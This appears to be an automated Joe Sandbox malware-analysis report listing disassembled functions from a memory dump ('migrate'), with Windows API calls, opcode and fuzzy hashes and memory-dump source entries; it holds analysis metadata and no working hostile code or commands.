                                                                                                                                                                                                    • Instruction ID: aac651c4f8c29394ce274443683066dc3ec603b843c2ea9933742764d623058e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37fbf3aa51f9364c3085eb74811a1a7b05ab4396a9b6be34bae7e566ccea6b55
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5301F7352123206AEF29AB755C49BFE3B98BF1A780F844435F912E6091D764CAC1C6B7
                                                                                                                                                                                                    Function 0013B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0013B8B8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Info
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                                                                                                    • Opcode ID: 3282b6938355c6dc349930d276512d348482d9d7654789de4dacadee12c1797d
                                                                                                                                                                                                    • Instruction ID: 54cb2225957a6824034df56aa132b4bc834d74dffe9141d1a5b751f6595023a5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3282b6938355c6dc349930d276512d348482d9d7654789de4dacadee12c1797d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB41F6B050828C9ADF258E648CD4BF6BBA9EF55308F1404EDE69A87142E335AA458B60
                                                                                                                                                                                                    Function 0013AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 0013AFDD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                                    • Opcode ID: 0ee61a96d65ee5b0387b380005feb262c7e291a90bdd26d33dc96a75672800d2
                                                                                                                                                                                                    • Instruction ID: 66bc42953d259a29392ff5957c5325f6a203c39ca93761dac190fb9f12fe03cc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ee61a96d65ee5b0387b380005feb262c7e291a90bdd26d33dc96a75672800d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D201E536504219BBCF129F90DC06DEE7F66EF09764F414154FE1466170CB728A71AB91
                                                                                                                                                                                                    Function 0013AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0013A56F), ref: 0013AF55
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                                                                                                    • Opcode ID: e94693d8842c4fdf0126981ce4e2485ccf727b64ffaf06711f8ba63620701acf
                                                                                                                                                                                                    • Instruction ID: 9be2288fc46ea80e01529336e81c112c4d9d669993dbf20f80d12a1881293439
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e94693d8842c4fdf0126981ce4e2485ccf727b64ffaf06711f8ba63620701acf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF0BE35645218BBCF12AF50DC02CAEBFA5EF15B21F404068FC18AA2B0DB714A219B86
                                                                                                                                                                                                    Function 0013ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Alloc
                                                                                                                                                                                                    • String ID: FlsAlloc
                                                                                                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                                                                                                    • Opcode ID: bede85d2a460aa947a95b8751d1c681d685a1bf043667390feda7b87d26a43c2
                                                                                                                                                                                                    • Instruction ID: 26d5038b69f8233104ec9357c52514907c434a25a0b1fe51b23799dce7dc3670
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bede85d2a460aa947a95b8751d1c681d685a1bf043667390feda7b87d26a43c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2E02B317492187BC711ABA5DC02D6EBB94DF65B31F4101A9FC05972A0DF705E4186D6
                                                                                                                                                                                                    Function 0012EAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0012EAF9
                                                                                                                                                                                                      • Part of subcall function 0012E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0012E8D0
                                                                                                                                                                                                      • Part of subcall function 0012E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0012E8E1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID: 3Ro
                                                                                                                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                                                                                                                    • Opcode ID: 049f8dd91d3c232962dba55d0a64f86bc1ea9d17d92586cd4b0f3d154854a41d
                                                                                                                                                                                                    • Instruction ID: 9d7d81830891e9e7b95ab185fa8c52fec4f812dae0335472313bf8b4b33fdc09
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 049f8dd91d3c232962dba55d0a64f86bc1ea9d17d92586cd4b0f3d154854a41d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9DB012D629B0727D310862003E02C37015CC1D1B90332C02EF414D50D1EF810C111471
                                                                                                                                                                                                    Function 0013BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0013B7BB: GetOEMCP.KERNEL32(00000000,?,?,0013BA44,?), ref: 0013B7E6
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0013BA89,?,00000000), ref: 0013BC64
                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,0013BA89,?,?,?,0013BA89,?,00000000), ref: 0013BC77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                                                                    • Opcode ID: a77a5a80f663bb337a354c41484e082a327be0d540f0c323f401e633007ca009
                                                                                                                                                                                                    • Instruction ID: 6d315fe691ddbde1159e6fd9d8c41db4c7499da5368b7e8dd186acf523ea41c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77a5a80f663bb337a354c41484e082a327be0d540f0c323f401e633007ca009
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96514770D082459FDB24CFB5C8C16BABBF5EF51308F14406ED6968B2A1F7359946CB90
                                                                                                                                                                                                    Function 00119A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00119A50,?,?,00000000,?,?,00118CBC,?), ref: 00119BAB
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00118411,-00009570,00000000,000007F3), ref: 00119BB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                    • Opcode ID: e784a37bbc91f5a7a50b1ffa7b0d04cd625c5c6e0f8407d8173700c3ae925ac5
                                                                                                                                                                                                    • Instruction ID: d319e767127bcf23469cd40fa4d89b7cd55e79b5965eb4e211813028dd501b41
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e784a37bbc91f5a7a50b1ffa7b0d04cd625c5c6e0f8407d8173700c3ae925ac5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E941CF745083018FDB2CDF15E5A4CAAB7E5FFD5320F158A3DE8A183260D770AD848A99
                                                                                                                                                                                                    Function 0013BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 001397E5: GetLastError.KERNEL32(?,00151098,00134674,00151098,?,?,001340EF,?,?,00151098), ref: 001397E9
                                                                                                                                                                                                      • Part of subcall function 001397E5: _free.LIBCMT ref: 0013981C
                                                                                                                                                                                                      • Part of subcall function 001397E5: SetLastError.KERNEL32(00000000,?,00151098), ref: 0013985D
                                                                                                                                                                                                      • Part of subcall function 001397E5: _abort.LIBCMT ref: 00139863
                                                                                                                                                                                                      • Part of subcall function 0013BB4E: _abort.LIBCMT ref: 0013BB80
                                                                                                                                                                                                      • Part of subcall function 0013BB4E: _free.LIBCMT ref: 0013BBB4
                                                                                                                                                                                                      • Part of subcall function 0013B7BB: GetOEMCP.KERNEL32(00000000,?,?,0013BA44,?), ref: 0013B7E6
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013BA9F
                                                                                                                                                                                                    • _free.LIBCMT ref: 0013BAD5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                                    • Opcode ID: 0097ba2859a1cacadb215ce942e7d8b4f8a75450983dfe9a130ed9730a682795
                                                                                                                                                                                                    • Instruction ID: f5573c1fa13f0a3eea1d678ac4c93917a3d643a7256cb63a0cbe82ff126d332c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0097ba2859a1cacadb215ce942e7d8b4f8a75450983dfe9a130ed9730a682795
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE31D73190860DAFDB10EFA8D481B9DB7F5EF51324F254099FA04AB2A2FB725D40DB50
                                                                                                                                                                                                    Function 00111E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00111E55
                                                                                                                                                                                                      • Part of subcall function 00113BBA: __EH_prolog.LIBCMT ref: 00113BBF
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00111EFD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: H_prolog$_wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2838827086-0
                                                                                                                                                                                                    • Opcode ID: f86bb2c4b12c86320dadbd424cd0004290b628256ba1af6b775802e6ac19f238
                                                                                                                                                                                                    • Instruction ID: aea6deabaeb106ed5d337006b2f60de083f78b06d94e958d045762ac47845956
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f86bb2c4b12c86320dadbd424cd0004290b628256ba1af6b775802e6ac19f238
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F317A72905219AFCF19EF98D945AEEFBF6AF68300F100069F945B3251CB325E91CB60
                                                                                                                                                                                                    Function 00119DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001173BC,?,?,?,00000000), ref: 00119DBC
                                                                                                                                                                                                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00119E70
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$BuffersFlushTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1392018926-0
                                                                                                                                                                                                    • Opcode ID: 81932000dc02e5109c7aeed8f1c662a790e21e1a7802287b5a7e496d1c75c6d0
                                                                                                                                                                                                    • Instruction ID: cf35d661a99b5f2d2ca68f405952708620168bb96cb494ccda570e661e916148
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81932000dc02e5109c7aeed8f1c662a790e21e1a7802287b5a7e496d1c75c6d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5221F631249245AFCB18CF74D4A1AEBBBE4AF65304F08492CF4E587541D339E98DDB62
                                                                                                                                                                                                    Function 0011966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00119F27,?,?,0011771A), ref: 001196E6
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00119F27,?,?,0011771A), ref: 00119716
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                    • Opcode ID: 9fc8927f6e4b03b849b419679d29afe8743caa75a39fc07c514f03f022a22629
                                                                                                                                                                                                    • Instruction ID: c642fb2078e9c20c7a28b1f1433b8ae4613c67bce4951b34141092222d0cb28a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fc8927f6e4b03b849b419679d29afe8743caa75a39fc07c514f03f022a22629
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8221BDB1504344AFE3348A65CC89BE7B7DCEB59320F100A29FAE5C25D1C774A8C4CA71
                                                                                                                                                                                                    Function 00119E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00119EC7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00119ED4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2976181284-0
                                                                                                                                                                                                    • Opcode ID: f8a24e33d25c3f2d09c01aa0894a060a22fe3a64361e18722bca6f5e0fa1682a
                                                                                                                                                                                                    • Instruction ID: 12f5c3c164d71155f50dc3cf2a9df338413bbdbc346e974c31d3626a215a4cd5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8a24e33d25c3f2d09c01aa0894a060a22fe3a64361e18722bca6f5e0fa1682a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C211E130601710ABD72CC628C890BE6B7E9AB45360F604A39E573D3AE0D771EDC9C760
                                                                                                                                                                                                    Function 00138E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 00138E75
                                                                                                                                                                                                      • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00151098,001117CE,?,?,00000007,?,?,?,001113D6,?,00000000), ref: 00138EB1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
